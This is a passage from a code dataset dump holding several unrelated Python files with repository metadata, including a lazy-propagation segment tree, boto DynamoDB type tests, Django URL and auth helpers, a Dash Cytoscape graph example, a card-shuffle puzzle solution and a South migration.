return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574 | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/segmented-tree/leon.py | 9b86c455efa6252c088d2e4fb3ac6b44b59e8988 | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 6,843 | py | # https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
"""
LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree
Build a new LPSTree with n elements.
If value is provided, all elements are set to value, otherwise 0.
Default reduce function is sum. Can alse be set to max or min.
If modulo is provide, modulo operation will be donw automatically.
"""
def __init__(self, n, value=None, reducef=None, modulo=None):
if n <= 0:
raise ValueError("n most be greater than 0")
self.n = n
size = 1;
while(size < n):
size *= 2
size *= 2
self.size = size
self.tree = [None] * size
self.boolset = [False] * size
self.booladd = [False] * size
self.lazyset = [None] * size
self.lazyadd = [None] * size
self.modulo = modulo
if not reducef:
reducef = sum
if reducef == sum:
self.nodef = (lambda val, n: val*n)
elif reducef == max or reducef == min:
self.nodef = (lambda val, n: val)
else:
raise ValueError("reducef can only be sum, max or min")
if self.modulo:
self.reducef = lambda x: reducef(x) % self.modulo
else:
self.reducef = reducef
if value != None:
array = [value] * n
else:
array = [0] * n
def construct(tree, array, sleft, sright, v):
if sleft+1 == sright:
tree[v] = array[sleft]
return tree[v]
smid = (sleft + sright) // 2
tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
construct(tree, array, smid, sright, 2*v+2)))
# if self.modulo:
# tree[v] %= self.modulo
# print tree
return tree[v]
construct(self.tree, array, 0, n, 0)
def __len__(self):
return self.n
def _lazypropagate(self, v, vleft, vright):
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
vmid = (vleft + vright) // 2
# print tree, v, tree[2*v+1], boolset[v], booladd[v]
if boolset[v]:
tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
boolset[2*v+1] = boolset[2*v+2] = True
booladd[2*v+1] = booladd[2*v+2] = False
lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
boolset[v] = False
if booladd[v]:
tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
if self.modulo:
tree[2*v+1] %= self.modulo
tree[2*v+2] %= self.modulo
if booladd[2*v+1]:
lazyadd[2*v+1] += lazyadd[v]
else:
booladd[2*v+1] = True
lazyadd[2*v+1] = lazyadd[v]
if booladd[2*v+2]:
lazyadd[2*v+2] += lazyadd[v]
else:
booladd[2*v+2] = True
lazyadd[2*v+2] = lazyadd[v]
booladd[v] = False
# print tree, v, tree[2*v+1]
def get(self, start, stop):
"""
LPSTree.get(start, stop) -> value
You can assume it same as reduce(reducef, tree[start:stop]).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _get(sleft, sright, v, vleft, vright):
# print v, start, stop, vleft, vright, tree
if sleft>=vright or sright <= vleft:
return
if sleft<=vleft and sright >= vright:
# if self.modulo:
# tree[v] %= self.modulo
return tree[v]
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
# print v, start, stop, vleft, vright, tree
return self.reducef([x for x in
(_get(sleft, sright, 2*v+1, vleft, vmid),
_get(sleft, sright, 2*v+2, vmid, vright))
if x != None])
return _get(start, stop, 0, 0, n)
def set(self, start, stop, value):
"""
LPSTRee.set(start, stop, value)
Set all elements in [start, stop) to value.
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _set(sleft, sright, v, vleft, vright, value):
# print v, start, stop, vleft, vright, value, tree
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] = self.nodef(value, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
boolset[v] = True
booladd[v] = False
lazyset[v] = value
# print v, tree, tree[v], tree[v] % self.modulo
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_set(sleft, sright, 2*v+1, vleft, vmid, value)
_set(sleft, sright, 2*v+2, vmid, vright, value)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
# print v, start, stop, vleft, vright, value, tree
_set(start, stop, 0, 0, n, value)
def add(self, start, stop, diff):
"""
LPSTRee.add(start, stop, diff)
Add diff to all elements in [start, stop).
"""
n = self.n
if not(start < stop and start >=0 and stop <= n):
raise IndexError(start, stop)
tree = self.tree
boolset = self.boolset
booladd = self.booladd
lazyset = self.lazyset
lazyadd = self.lazyadd
def _add(sleft, sright, v, vleft, vright, diff):
if sleft >= vright or sright <= vleft:
return
if sleft <= vleft and sright >= vright:
tree[v] += self.nodef(diff, vright-vleft)
if self.modulo:
tree[v] %= self.modulo
if booladd[v]:
lazyadd[v] += diff
else:
booladd[v] = True
lazyadd[v] = diff
return
vmid = (vleft + vright) // 2
self._lazypropagate(v, vleft, vright)
_add(sleft, sright, 2*v+1, vleft, vmid, diff)
_add(sleft, sright, 2*v+2, vmid, vright, diff)
tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
# if self.modulo:
# tree[v] %= self.modulo
_add(start, stop, 0, 0, n, diff)
def __getitem__(self, index):
return self.get(index, index+1)
def __setitem__(self, index, value):
self.set(index, index+1, value)
def __repr__(self):
return repr([self[x] for x in xrange(self.n)])
def tolist(self):
"""
LPSTree.tolist() -> a list object
Return a list containing all the elements in LPSTree.
"""
return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
tree = LPSTree(10, reducef=max)
# tree = LPSTree(10, modulo=2)
# tree = LPSTree(10)
print tree.n, tree.size
print tree.get(0, 10)
print tree[0], tree[1]
tree[9] = 20
print tree
print tree.get(0, 10)
tree.set(1,5,5)
print tree
tree.add(1, 10, 12)
print tree
tree.set(0, 3, 5)
tree.add(0, 4, 2)
print tree
tree.set(0, 10, 0)
print tree
tree.add(1, 9, -10)
print tree
print tree.get(8, 9)
tree.set(0, 3, 9)
print tree
tree = LPSTree(10, reducef=max)
print tree
# tree.set(0, 10, 0)
# help(tree.set)
tree.set(1, 9, -10)
print tree
| [
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34 | 19892b65355f7661cf5e42d2f749904788c1a7d0 | /dailyfresh/daily_fresh/utils/mixin.py | 6174e5aba8081e3b2cf0368084ea7f0853225db5 | [] | no_license | BinXiaoEr/daily_fresh | 35902cb6753851a14517265db3738a008610c7d8 | d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d | refs/heads/master | 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
@classmethod
def as_view(cls, **initkwargs):
# 调用父类的as_view
view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
return login_required(view) | [
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf | 612325535126eaddebc230d8c27af095c8e5cc2f | /depot_tools/external_bin/gsutil/gsutil_4.15/gsutil/third_party/boto/tests/unit/dynamodb/test_types.py | e3b913d7eb4a7e8789aa9a1becd8cefa58b17d6a | [
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] | permissive | TrellixVulnTeam/proto-quic_1V94 | 1a3a03ac7a08a494b3d4e9857b24bb8f2c2cd673 | feee14d96ee95313f236e0f0e3ff7719246c84f7 | refs/heads/master | 2023-04-01T14:36:53.888576 | 2019-10-17T02:23:04 | 2019-10-17T02:23:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,427 | py | #!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from decimal import Decimal
from tests.compat import unittest
from boto.compat import six
from boto.dynamodb import types
from boto.dynamodb.exceptions import DynamoDBNumberError
class TestDynamizer(unittest.TestCase):
def setUp(self):
pass
def test_encoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.encode('foo'), {'S': 'foo'})
self.assertEqual(dynamizer.encode(54), {'N': '54'})
self.assertEqual(dynamizer.encode(Decimal('1.1')), {'N': '1.1'})
self.assertEqual(dynamizer.encode(set([1, 2, 3])),
{'NS': ['1', '2', '3']})
self.assertIn(dynamizer.encode(set(['foo', 'bar'])),
({'SS': ['foo', 'bar']}, {'SS': ['bar', 'foo']}))
self.assertEqual(dynamizer.encode(types.Binary(b'\x01')),
{'B': 'AQ=='})
self.assertEqual(dynamizer.encode(set([types.Binary(b'\x01')])),
{'BS': ['AQ==']})
self.assertEqual(dynamizer.encode(['foo', 54, [1]]),
{'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]})
self.assertEqual(dynamizer.encode({'foo': 'bar', 'hoge': {'sub': 1}}),
{'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}})
self.assertEqual(dynamizer.encode(None), {'NULL': True})
self.assertEqual(dynamizer.encode(False), {'BOOL': False})
def test_decoding_to_dynamodb(self):
dynamizer = types.Dynamizer()
self.assertEqual(dynamizer.decode({'S': 'foo'}), 'foo')
self.assertEqual(dynamizer.decode({'N': '54'}), 54)
self.assertEqual(dynamizer.decode({'N': '1.1'}), Decimal('1.1'))
self.assertEqual(dynamizer.decode({'NS': ['1', '2', '3']}),
set([1, 2, 3]))
self.assertEqual(dynamizer.decode({'SS': ['foo', 'bar']}),
set(['foo', 'bar']))
self.assertEqual(dynamizer.decode({'B': 'AQ=='}), types.Binary(b'\x01'))
self.assertEqual(dynamizer.decode({'BS': ['AQ==']}),
set([types.Binary(b'\x01')]))
self.assertEqual(dynamizer.decode({'L': [{'S': 'foo'}, {'N': '54'}, {'L': [{'N': '1'}]}]}),
['foo', 54, [1]])
self.assertEqual(dynamizer.decode({'M': {'foo': {'S': 'bar'}, 'hoge': {'M': {'sub': {'N': '1'}}}}}),
{'foo': 'bar', 'hoge': {'sub': 1}})
self.assertEqual(dynamizer.decode({'NULL': True}), None)
self.assertEqual(dynamizer.decode({'BOOL': False}), False)
def test_float_conversion_errors(self):
dynamizer = types.Dynamizer()
# When supporting decimals, certain floats will work:
self.assertEqual(dynamizer.encode(1.25), {'N': '1.25'})
# And some will generate errors, which is why it's best
# to just use Decimals directly:
with self.assertRaises(DynamoDBNumberError):
dynamizer.encode(1.1)
def test_non_boolean_conversions(self):
dynamizer = types.NonBooleanDynamizer()
self.assertEqual(dynamizer.encode(True), {'N': '1'})
def test_lossy_float_conversions(self):
dynamizer = types.LossyFloatDynamizer()
# Just testing the differences here, specifically float conversions:
self.assertEqual(dynamizer.encode(1.1), {'N': '1.1'})
self.assertEqual(dynamizer.decode({'N': '1.1'}), 1.1)
self.assertEqual(dynamizer.encode(set([1.1])),
{'NS': ['1.1']})
self.assertEqual(dynamizer.decode({'NS': ['1.1', '2.2', '3.3']}),
set([1.1, 2.2, 3.3]))
class TestBinary(unittest.TestCase):
def test_good_input(self):
data = types.Binary(b'\x01')
self.assertEqual(b'\x01', data)
self.assertEqual(b'\x01', bytes(data))
def test_non_ascii_good_input(self):
# Binary data that is out of ASCII range
data = types.Binary(b'\x88')
self.assertEqual(b'\x88', data)
self.assertEqual(b'\x88', bytes(data))
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_bad_input(self):
with self.assertRaises(TypeError):
types.Binary(1)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_bytes_input(self):
data = types.Binary(1)
self.assertEqual(data, b'\x00')
self.assertEqual(data.value, b'\x00')
@unittest.skipUnless(six.PY2, "Python 2 only")
def test_unicode_py2(self):
# It's dirty. But remains for backward compatibility.
data = types.Binary(u'\x01')
self.assertEqual(data, b'\x01')
self.assertEqual(bytes(data), b'\x01')
# Delegate to built-in b'\x01' == u'\x01'
# In Python 2.x these are considered equal
self.assertEqual(data, u'\x01')
# Check that the value field is of type bytes
self.assertEqual(type(data.value), bytes)
@unittest.skipUnless(six.PY3, "Python 3 only")
def test_unicode_py3(self):
with self.assertRaises(TypeError):
types.Binary(u'\x01')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
7321ac8c981ab9abb728e9c05fe1a2576ef0d878 | 3c327aa333bbeafacb8d5bd253814776ffcd0012 | /df_user/urls.py | bf6fcb54488289e42e7484712a3e096f56b612be | [] | no_license | 1635848644/shopping | c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18 | d820e828eeed3911ea7741e4f11f4c6d83e993c6 | refs/heads/master | 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | #coding=utf-8
from django.conf.urls import url
from df_user import views
urlpatterns=[
url('register/',views.register),
url('login/',views.login),
url('logout/',views.logout),
url('addHarvsetAddress/',views.addHarvsetAddress),
url('user_center_info/',views.user_center_info),
url('user_center_order/',views.user_center_order),
url('user_center_site/',views.user_center_site),
] | [
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49 | 46c2418ecfcf3c7034a267364185208a665be583 | /edb/tools/docs/cli.py | 2c9295564c14536c42a30b9de2055cc410bdcb02 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jankeromnes/edgedb | 3434549fb0731632ed7adb7fcb329480dee50d91 | 40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94 | refs/heads/master | 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 | Apache-2.0 | 2022-01-28T09:00:32 | 2019-05-10T12:24:55 | Python | UTF-8 | Python | false | false | 1,466 | py | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
has_content = True
optional_arguments = 0
required_arguments = 0
option_spec = {}
def run(self):
self.arguments = ['cli-synopsis']
return super().run()
class CLIDomain(s_domains.Domain):
name = "cli"
label = "Command Line Interface"
directives = {
'synopsis': CLISynopsisDirective,
}
def setup_domain(app):
app.add_lexer("cli", EdgeQLLexer())
app.add_lexer("cli-synopsis", EdgeQLLexer())
app.add_role(
'cli:synopsis',
shared.InlineCodeRole('cli-synopsis'))
app.add_domain(CLIDomain)
| [
"[email protected]"
] | |
81b968c9d9e14ff5772ae28bead91e71f66173d8 | 50e2012ecea8307e278d1132ca0094adb940aff2 | /lib/review/my_process/my_multiprocessing.py | a299b8a3185df0bb568f1c9bc93484f95d15cfcb | [] | no_license | Lewescaiyong/my_library | 6689cae2db4aaa980b4bd5ed9f21691eefbff2fe | 35d0d29097823ccef74fa29ca8756a7f59ceeb78 | refs/heads/master | 2020-11-25T09:20:56.484275 | 2019-12-17T10:58:20 | 2019-12-17T10:58:20 | 228,593,219 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing.dummy import Pool
pool1 = multiprocessing.Pool()
pool2 = Pool()
pool1.map()
pool2.map()
| [
"[email protected]"
] | |
1308c8f92d220ac7b01c451288da34696bcbe3f8 | c52ea8af6a4d3c32a0557c39d683a4d01b2188db | /ch10_dash_cytoscape_basic/layout/dash_cyto_grid_option_curve_style.py | 00701dcffe65b44108634f361e1dafb4d3efea61 | [
"MIT"
] | permissive | plotly-dash-book/plotly-dash-book | dcde031766d17adf6fc670c8aec9c8d4e267eeb7 | cc54f7ac6066a741f733facbd002222a87746e02 | refs/heads/master | 2022-06-27T02:46:25.502190 | 2022-06-08T03:21:23 | 2022-06-08T03:21:23 | 197,512,189 | 30 | 18 | MIT | 2021-05-31T04:47:36 | 2019-07-18T04:36:50 | Jupyter Notebook | UTF-8 | Python | false | false | 1,531 | py | import dash
import dash_cytoscape as cyto
import dash_html_components as html
app = dash.Dash(__name__)
# ノードを17個定義
nodes = [{"data": {"id": x, "label": f"{x}"}} for x in range(17)]
# エッジを定義
edges = [
{"data": {"source": 0, "target": 1}},
{"data": {"source": 0, "target": 2}},
{"data": {"source": 0, "target": 3}},
{"data": {"source": 0, "target": 4}},
{"data": {"source": 2, "target": 3}},
{"data": {"source": 3, "target": 4}},
{"data": {"source": 4, "target": 5}},
{"data": {"source": 5, "target": 1}},
{"data": {"source": 1, "target": 6}},
{"data": {"source": 2, "target": 7}},
{"data": {"source": 2, "target": 8}},
{"data": {"source": 3, "target": 9}},
{"data": {"source": 4, "target": 10}},
{"data": {"source": 4, "target": 11}},
{"data": {"source": 4, "target": 12}},
{"data": {"source": 5, "target": 13}},
{"data": {"source": 5, "target": 14}},
{"data": {"source": 6, "target": 15}},
]
elements = nodes + edges
cyto_compo = cyto.Cytoscape(
id="dash_cyto_layout",
style={"width": "400px", "height": "400px"},
layout={"name": "grid", "rows": 3, "columns": 6},
elements=elements,
stylesheet=[
{"selector": "node", "style": {"content": "data(label)"}},
# エッジのカーブのスタイルを曲線にする
{"selector": "edge", "style": {"curve-style": "unbundled-bezier"}},
],
)
app.layout = html.Div([cyto_compo])
if __name__ == "__main__":
app.run_server(debug=True) | [
"[email protected]"
] | |
805e778f090eb8a26dac37e6725197e259091f56 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KLke67efuam6ajLrt_2.py | 1dc365bb23d969b5f0f0d4e85f8e8ff90a1cf504 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,765 | py | """
An **out-shuffle** , also known as an _out faro shuffle_ or a _perfect
shuffle_ , is a controlled method for shuffling playing cards. It is performed
by splitting the deck into two equal halves and interleaving them together
perfectly, with the condition that the top card of the deck remains in place.
Using an array to represent a deck of cards, an out-shuffle looks like:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
// Card 1 remains in the first position.
If we repeat the process, the deck eventually returns to original order.
Shuffle 1:
[1, 2, 3, 4, 5, 6, 7, 8] ➞ [1, 5, 2, 6, 3, 7, 4, 8]
Shuffle 2:
[1, 5, 2, 6, 3, 7, 4, 8] ➞ [1, 3, 5, 7, 2, 4, 6, 8]
Shuffle 3:
[1, 3, 5, 7, 2, 4, 6, 8] ➞ [1, 2, 3, 4, 5, 6, 7, 8]
// Back where we started.
Write a function that takes a positive even integer representing the number of
the cards in a deck, and returns the number of out-shuffles required to return
the deck to its original order.
### Examples
shuffle_count(8) ➞ 3
shuffle_count(14) ➞ 12
shuffle_count(52) ➞ 8
### Notes
* The number of cards is always **even** and **greater than one**. Thus, the smallest possible deck size is **two**.
* A **recursive** version of this challenge can be found via this [link](https://edabit.com/challenge/EXNAxFGgDDtE3SbQf).
"""
def shuffle_count(num):
half = num // 2
deck = list(range(num))
left, right = deck[:half], deck[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count = 1
while deck_s != deck:
left, right = deck_s[:half], deck_s[half:]
deck_s = [right[i // 2] if i % 2 else left[i // 2] for i in range(num)]
count += 1
return count
| [
"[email protected]"
] | |
50845d3ddab1ec682e0f345e3c75c1ba47438990 | ed872a0efb1db283f48176474e22f4c4ad31db79 | /src/accounts/migrations/0019_fix_socail_auth.py | ceffd3defcff51b96d673f95e0fffd2933671048 | [] | no_license | barontxu/djbookru | 34c2bf90e5d3542e4cbd2f3e600e1c0a12795d35 | 388bff0491e961f8efdf3cabd6c47d9fa2988547 | refs/heads/master | 2021-01-16T20:39:33.949315 | 2014-06-20T12:22:56 | 2014-06-20T12:22:56 | 23,031,683 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,111 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
('social_auth', '0002_auto__add_unique_nonce_timestamp_salt_server_url__add_unique_associati'),
)
def forwards(self, orm):
"Write your forwards methods here."
orm['social_auth.UserSocialAuth'].objects.filter(provider='google').delete()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'accounts.achievement': {
'Meta': {'object_name': 'Achievement'},
'active_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inactive_icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'accounts.announcement': {
'Meta': {'object_name': 'Announcement'},
'content': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'accounts.emailconfirmation': {
'Meta': {'object_name': 'EmailConfirmation'},
'confirmation_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sent': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'accounts.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'achievements': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['accounts.Achievement']", 'through': "orm['accounts.UserAchievement']", 'symmetrical': 'False'}),
'biography': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_valid_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_doc_comments_read': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'lat': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'lng': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'accounts.userachievement': {
'Meta': {'unique_together': "(('user', 'achievement'),)", 'object_name': 'UserAchievement'},
'achievement': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Achievement']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'social_auth.association': {
'Meta': {'unique_together': "(('server_url', 'handle'),)", 'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'social_auth.nonce': {
'Meta': {'unique_together': "(('server_url', 'timestamp', 'salt'),)", 'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'social_auth.usersocialauth': {
'Meta': {'unique_together': "(('provider', 'uid'),)", 'object_name': 'UserSocialAuth'},
'extra_data': ('social_auth.fields.JSONField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'social_auth'", 'to': "orm['accounts.User']"})
}
}
complete_apps = ['social_auth', 'accounts']
symmetrical = True
| [
"[email protected]"
] | |
be18a828d415817294724c04ce3bef696dac9a91 | d9af3a98a0864de7ebb0cfd1675a052779e46bf2 | /transformer_split/vae_model.py | e94ea7dccaf8599afbe98b4b7e286dfb52f4a1af | [
"MIT"
